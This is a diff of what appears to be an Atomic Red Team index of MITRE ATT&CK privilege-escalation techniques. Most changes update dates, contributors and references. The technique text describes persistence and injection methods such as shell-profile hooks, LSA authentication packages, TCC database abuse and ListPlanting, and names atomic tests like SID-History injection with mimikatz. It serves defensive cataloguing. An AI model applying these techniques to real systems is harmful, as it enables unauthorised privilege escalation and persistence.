-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -38200,6 +38438,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -38210,9 +38452,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -38221,8 +38467,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -38268,7 +38573,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -38293,8 +38598,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests:
     - name: Injection SID-History with mimikatz
@@ -38347,7 +38650,7 @@ privilege-escalation:
           '
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -38427,7 +38730,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -38463,7 +38765,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -38486,7 +38788,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests:
     - name: Authentication Package
@@ -38509,7 +38810,7 @@ privilege-escalation:
         elevation_required: true
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -38587,7 +38888,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests:
     - name: COM Hijacking - InprocServer32
@@ -38730,7 +39030,7 @@ privilege-escalation:
         name: powershell
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -38791,7 +39091,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests:
     - name: Execution of program.exe as service with unquoted service path
@@ -38863,7 +39162,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -38885,7 +39184,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -38966,7 +39264,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -38989,7 +39286,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -39019,12 +39316,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -39109,7 +39404,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests:
     - name: Install AppInit Shim
@@ -39233,7 +39527,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests:
     - name: Set Arbitrary Binary as Screensaver
@@ -39342,7 +39635,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -39370,7 +39663,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -39401,7 +39693,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -39444,12 +39736,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -39466,7 +39756,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -39525,7 +39815,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -39607,12 +39896,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -39709,7 +39997,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -39823,7 +40110,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -39893,7 +40179,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -39921,7 +40206,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -39965,8 +40250,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -40002,7 +40285,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -40021,12 +40304,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -40076,7 +40358,6 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests:
     - name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -40195,7 +40476,7 @@ privilege-escalation:
         elevation_required: true
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -40228,9 +40509,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -40247,9 +40529,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -40295,38 +40576,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -40334,6 +40596,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -40341,7 +40605,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -40371,7 +40635,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -40417,7 +40680,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -40462,8 +40725,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -40489,7 +40750,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -40515,8 +40776,6 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests:
     - name: Logon Scripts
@@ -40546,53 +40805,24 @@ privilege-escalation:
         name: command_prompt
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
